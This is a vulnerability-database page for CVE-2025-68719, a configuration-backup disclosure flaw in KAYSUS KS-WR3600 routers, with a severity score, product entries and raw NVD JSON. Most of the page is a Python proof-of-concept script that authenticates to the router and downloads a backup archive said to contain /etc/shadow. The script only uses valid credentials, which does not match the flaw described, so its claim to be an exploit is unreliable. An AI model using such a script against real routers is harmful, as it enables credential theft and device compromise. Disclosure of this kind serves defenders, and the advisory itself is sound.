Security Vulnerability Report
中文
CVE-2025-68719 CVSS 8.8 HIGH

CVE-2025-68719

Published: 2026-01-08 21:15:44
Last Modified: 2026-02-02 16:28:05
Source: [email protected]

Description

KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 mishandle configuration management. Once any user is logged in and maintains an active session, an attacker can directly query the backup endpoint and download a full configuration archive. This archive contains sensitive files such as /etc/shadow, enabling credential recovery and potential full compromise of the device.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:kaysus:ks-wr3600_firmware:1.0.5.9.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:kaysus:ks-wr3600:-:*:*:*:*:*:*:* - NOT VULNERABLE
KAYSUS KS-WR3600 固件 1.0.5.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-68719 PoC - KAYSUS KS-WR3600 Configuration Backup Exploit # Description: Exploit to download sensitive configuration archive from KAYSUS KS-WR3600 router import requests import sys def exploit_ks_wr3600(target_ip, username, password): """ Exploit the configuration backup vulnerability in KAYSUS KS-WR3600 routers Args: target_ip: Target router IP address username: Valid username for authentication password: Valid password for authentication Returns: bool: True if exploitation successful, False otherwise """ base_url = f"http://{target_ip}" # Step 1: Authenticate to the router login_url = f"{base_url}/cgi-bin/login.cgi" login_data = { "username": username, "password": password } session = requests.Session() try: login_response = session.post(login_url, data=login_data, timeout=10) if login_response.status_code != 200: print(f"[-] Login failed with status code: {login_response.status_code}") return False print("[+] Authentication successful") # Step 2: Download configuration backup backup_url = f"{base_url}/cgi-bin/backup.cgi" backup_response = session.get(backup_url, timeout=30) if backup_response.status_code == 200 and len(backup_response.content) > 0: # Save the configuration archive output_file = "config_backup.tar.gz" with open(output_file, "wb") as f: f.write(backup_response.content) print(f"[+] Configuration backup downloaded successfully: {output_file}") print(f"[+] File size: {len(backup_response.content)} bytes") print("[+] The archive contains sensitive files including /etc/shadow") print("[+] Attackers can extract credentials and compromise the device") return True else: print(f"[-] Backup download failed with status code: {backup_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python3 {sys.argv[0]} <target_ip> <username> <password>") print(f"Example: python3 {sys.argv[0]} 192.168.1.1 admin admin123") sys.exit(1) target_ip = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print(f"[*] Targeting KAYSUS KS-WR3600 router at {target_ip}") print(f"[*] CVE-2025-68719 - Configuration Backup Vulnerability") exploit_ks_wr3600(target_ip, username, password)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68719", "sourceIdentifier": "[email protected]", "published": "2026-01-08T21:15:43.603", "lastModified": "2026-02-02T16:28:04.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 mishandle configuration management. Once any user is logged in and maintains an active session, an attacker can directly query the backup endpoint and download a full configuration archive. This archive contains sensitive files such as /etc/shadow, enabling credential recovery and potential full compromise of the device."}, {"lang": "es", "value": "Los routers KAYSUS KS-WR3600 con firmware 1.0.5.9.1 gestionan incorrectamente la configuración. Una vez que cualquier usuario ha iniciado sesión y mantiene una sesión activa, un atacante puede consultar directamente el endpoint de copia de seguridad y descargar un archivo de configuración completo. Este archivo contiene archivos sensibles como /etc /shadow, lo que permite la recuperación de credenciales y un posible compromiso total del dispositivo."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-552"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kaysus:ks-wr3600_firmware:1.0.5.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "5A325820-C480-454D-9A4F-AC61604C5566"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kaysus:ks-wr3600:-:*:*:*:*:*:*:*", "matchCriteriaId": "B2859021-9B27-47E2-9802-AE453C915F8D"}]}]}], "references": [{"url": "https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68719.txt", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/actuator/cve/tree/main/KAYSUS", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.